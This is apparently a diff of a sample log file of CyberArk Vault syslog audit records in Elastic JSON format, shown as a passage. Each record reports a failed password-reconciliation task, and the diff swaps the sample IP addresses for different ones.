Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=3;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 07:49:11","IsoTimestamp":"2021-03-14T14:49:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=3;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615733350"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T10:12:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:18\n 2021-03-15T10:12:18Z\n VAULT\n Cyber-Ark\n Vault\n 
11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=4;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:18","IsoTimestamp":"2021-03-15T10:12:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=4;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T10:12:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:19\n 2021-03-15T10:12:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n\n address=34.123.103.115;retriescount=1;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:19","IsoTimestamp":"2021-03-15T10:12:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=34.123.103.115;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T13:04:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:04:27\n 2021-03-15T13:04:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n\n address=34.123.103.115;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:04:27","IsoTimestamp":"2021-03-15T13:04:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=34.123.103.115;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615813465"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T14:44:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:44:37\n 2021-03-15T14:44:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=34.123.103.115;retriescount=1;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:44:37","IsoTimestamp":"2021-03-15T14:44:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n","ExtraDetails":"address=34.123.103.115;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<7>1 2021-03-11T21:12:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:12:22\n 2021-03-11T21:12:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:12:22","IsoTimestamp":"2021-03-11T21:12:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615497142"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-14T13:18:15Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:18:15\n 2021-03-14T13:18:15Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n 
Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=2;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:18:15","IsoTimestamp":"2021-03-14T13:18:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=2;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615727895"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-14T13:46:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:46:13\n 2021-03-14T13:46:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n\n address=67.43.156.15;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:46:13","IsoTimestamp":"2021-03-14T13:46:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=67.43.156.15;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-14T14:49:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 07:49:11\n 2021-03-14T14:49:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=3;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 07:49:11","IsoTimestamp":"2021-03-14T14:49:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=3;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615733350"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T10:12:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:18\n 2021-03-15T10:12:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=4;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:18","IsoTimestamp":"2021-03-15T10:12:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=4;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T10:12:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:19\n 2021-03-15T10:12:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 
60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=67.43.156.15;retriescount=1;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:19","IsoTimestamp":"2021-03-15T10:12:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n","ExtraDetails":"address=67.43.156.15;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=5;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Reconcile Password 